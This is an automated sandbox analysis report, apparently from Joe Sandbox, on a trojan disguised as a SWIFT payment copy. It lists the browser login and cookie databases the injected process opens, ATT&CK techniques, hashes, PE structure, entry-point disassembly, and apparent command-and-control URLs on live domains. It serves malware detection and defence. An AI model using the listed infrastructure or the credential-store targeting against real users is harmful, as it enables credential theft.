            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 2_2_0041783A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: GetLocaleInfoW, 2_2_00419961
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 2_2_0040A970
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 2_2_0040D9E2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_00419A89
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: GetLocaleInfoW,_GetPrimaryLen, 2_2_00419B36
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _memset,_TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s, 2_2_00419B9E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW, 2_2_004193BE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00417431
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: EnumSystemLocalesW, 2_2_0040D55D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 2_2_00415534
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: GetLocaleInfoW, 2_2_0040D59A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _GetPrimaryLen,EnumSystemLocalesW, 2_2_0041966E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: EnumSystemLocalesW, 2_2_0041962E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00417E3E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: _GetPrimaryLen,EnumSystemLocalesW, 2_2_004196EB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW, 2_2_0041976E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe; Code function: 2_2_004115AC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 2_2_004115AC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe; Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A

            Stealing of Sensitive Information

            Source: Yara match; File source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\typeperf.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\typeperf.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 412 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 2 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; Steganography; Compile After Delivery
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 1 System Time Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 26 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
            Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
            Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS

            [Behavior graph] Behavior Graph ID: 1355380; Sample: Payment_Copy_[SWIFT_COPY].exe; Startdate: 07/12/2023; Architecture: WINDOWS; Score: 100

            Source | Detection | Scanner | Label | Link
            Payment_Copy_[SWIFT_COPY].exe | 30% | ReversingLabs | Win32.Trojan.Sonbokli
            Payment_Copy_[SWIFT_COPY].exe | 100% | Joe Sandbox ML
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\btpqr.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\btpqr.exe | 24% | ReversingLabs | Win32.Trojan.Generic
            No Antivirus matches
            No Antivirus matches
                                                              unknown
                                                              http://www.blessingstation.org/m858/true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.hmoatl.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w==true
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag==true
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.belaflorloja.online/m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6true
                                                              • Avira URL Cloud: malware
                                                              unknown
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1355380
Start date and time: 2023-12-07 13:41:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment_Copy_[SWIFT_COPY].exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/3@24/13
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 138
• Number of non-executed functions: 214
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mNtjNwEeCHVoSqPJEzBvhXy.exe, PID 6988 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • VT rate limit hit for: Payment_Copy_[SWIFT_COPY].exe
Time | Type | Description
13:42:47 | API Interceptor | 10977369x Sleep call for process: typeperf.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      • 213.186.33.24
                                                                                                                      bntdUUqrfu.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 51.38.43.18
                                                                                                                      https://sports.zaly.online/57724/Get hashmaliciousUnknownBrowse
                                                                                                                      • 147.135.71.152
                                                                                                                      LEASEWEB-USA-WDCUShttps://conexaoufo.com/en/salyut-7-space-angels-sighted-by-russian-cosmonauts/?fbclid=IwAR0M6Prz4YudFXb6qx6hSSNhDH_aQ50t8dMsDeG9zxGInfhVplAejrcwSlgGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.57
                                                                                                                      6iDFqoUZdJ.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                      • 23.82.12.37
                                                                                                                      https://bsetsy.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 216.22.16.40
                                                                                                                      https://smbc-card.world/index/indexinfore.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.56
                                                                                                                      http://nerokolim.camGet hashmaliciousUnknownBrowse
                                                                                                                      • 192.96.203.13
                                                                                                                      Payment_Notification.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 23.82.12.31
                                                                                                                      wechat_XC560-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.151
                                                                                                                      Bntwfkvhnfruab.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      https://taget.comGet hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.137
                                                                                                                      file.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                      • 216.38.55.227
                                                                                                                      https://myaccount.dropsend.com/file/099c02133fa10997Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 192.96.202.199
                                                                                                                      Quotation_File_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      • 23.82.12.35
                                                                                                                      8319.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 162.210.199.87
                                                                                                                      https://lazesoft.com/Get hashmaliciousUnknownBrowse
                                                                                                                      • 23.105.12.142
                                                                                                                      wlanext.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      https://arthurrlemus.wixsite.com/micr/officeGet hashmaliciousUnknownBrowse
                                                                                                                      • 216.22.16.8
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      List_of_Items.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                      • 23.82.12.30
                                                                                                                      No context
                                                                                                                      No context
                                                                                                                      Process:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):196608
                                                                                                                      Entropy (8bit):1.1209886597424439
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Process:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):168960
                                                                                                                      Entropy (8bit):6.43320077439248
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:5LaizcaUwmVsRIRRKbsg+/6mCl1Hq6J/l:5LZoaUTnRwHu+D9
                                                                                                                      MD5:51D987CA1642C555FB00D10AA35F8348
                                                                                                                      SHA1:475108E332234B36AD8491D6010C397B7EC6D0AE
                                                                                                                      SHA-256:7ECD102670B6CCAE894FF3C27551C3A97955C4CE883B6D770FC123B46BA00332
                                                                                                                      SHA-512:48CD80C476958B05EDD414378A8026318A2C40360E60FE7C9CFCE8897E4876FAC2B65AE58B1D250CF3242DE8E67E3A9E9E52161CC576A13FDBD58F4B15AC8858
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                      Reputation:low
                                                                                                                      Process:C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):270849
                                                                                                                      Entropy (8bit):7.998703085386478
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:6144:0Z4g6Zi1VxUI9M8WYE3EYEOv5wgwymdFJi5+vM6shfV8b:0mgzxQYE3DEOBjKdFJiYDF
                                                                                                                      MD5:3EA668294E0F99D7BF4B0F665A1F9E65
                                                                                                                      SHA1:922DD86958DCEFCA6A3FBF311B7FEEE1AC8F3811
                                                                                                                      SHA-256:0BADC2B358299E411E0A31B21F7FB62D4D35C069332C0F35E010DE116B6E5CA9
                                                                                                                      SHA-512:54AD6632FD6526AAE3C025E2CA2C954F64623B9C655DBABF4210F4ECB944BED1F475BB0B326B9957CACC04C1874C323697847B5660A30520288098B3C321F0E3
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.957047282988841
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:Payment_Copy_[SWIFT_COPY].exe
                                                                                                                      File size:390'725 bytes
                                                                                                                      MD5:1827b46843b0cf4502a0c0395914842d
                                                                                                                      SHA1:4af6143d665e11ef138534c1f803ec7531a07d4d
                                                                                                                      SHA256:50a40c6d5d6f716a1af1ff170aa99c4c0a21271995d5d14817f9955aabd6aa67
                                                                                                                      SHA512:51dd133f82332461b1c1dd1bdc5925ed344cc82842ba4b99b0f65c664331d83b0a503d346848c75c26344223a47dee59169b5436a20428aa12983b5edead1620
                                                                                                                      SSDEEP:6144:P8LxBiZcMlUI2MvWhE3EPEOv5/gwymdFJi5+8KzpWxUUn51ixB9HYbHp:DFlAhE3mEOBoKdFJi2zpWx151EXHAHp
                                                                                                                      TLSH:2684230BAAC22ABEF0D246B05BAB87B5F77B51050441BA57CB503D7D24729C7B7063B8
                                                                                                                      Icon Hash:3d2e0f95332b3399
                                                                                                                      Entrypoint:0x40312a
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:b76363e9cb88bf9390860da8e50999d2
                                                                                                                      Instruction
                                                                                                                      sub esp, 00000184h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebx
                                                                                                                      mov dword ptr [esp+14h], 00409168h
                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                      mov byte ptr [esp+18h], 00000020h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      call dword ptr [004070ACh]
                                                                                                                      cmp ax, 00000006h
                                                                                                                      je 00007F97F06C34C3h
                                                                                                                      push ebx
                                                                                                                      call 00007F97F06C62A4h
                                                                                                                      cmp eax, ebx
                                                                                                                      je 00007F97F06C34B9h
                                                                                                                      push 00000C00h
                                                                                                                      call eax
                                                                                                                      mov esi, 00407280h
                                                                                                                      push esi
                                                                                                                      call 00007F97F06C6220h
                                                                                                                      push esi
                                                                                                                      call dword ptr [00407108h]
                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                      cmp byte ptr [esi], bl
                                                                                                                      jne 00007F97F06C349Dh
                                                                                                                      push 0000000Dh
                                                                                                                      call 00007F97F06C6278h
                                                                                                                      push 0000000Bh
                                                                                                                      call 00007F97F06C6271h
                                                                                                                      mov dword ptr [0042EC24h], eax
                                                                                                                      call dword ptr [00407038h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040726Ch]
                                                                                                                      mov dword ptr [0042ECD8h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 00429058h
                                                                                                                      call dword ptr [0040715Ch]
                                                                                                                      push 0040915Ch
                                                                                                                      push 0042E420h
                                                                                                                      call 00007F97F06C5EA4h
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      mov ebp, 00434000h
                                                                                                                      push eax
                                                                                                                      push ebp
                                                                                                                      call 00007F97F06C5E92h
                                                                                                                      push ebx
                                                                                                                      call dword ptr [00407144h]
                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0xbe8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e66 | 0x6000 | False | 0.6705729166666666 | data | 6.440655734359132 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.058328787102383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x37000 | 0xbe8 | 0xc00 | False | 0.4505208333333333 | data | 4.364570615142666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x371d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.42473118279569894
RT_DIALOG | 0x374c0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x375c0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x376e0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x37740 | 0x14 | data | English | United States | 1.2
RT_VERSION | 0x37758 | 0x1bc | data | English | United States | 0.5135135135135135
RT_MANIFEST | 0x37918 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States | 0.5656424581005587
DLL | Import
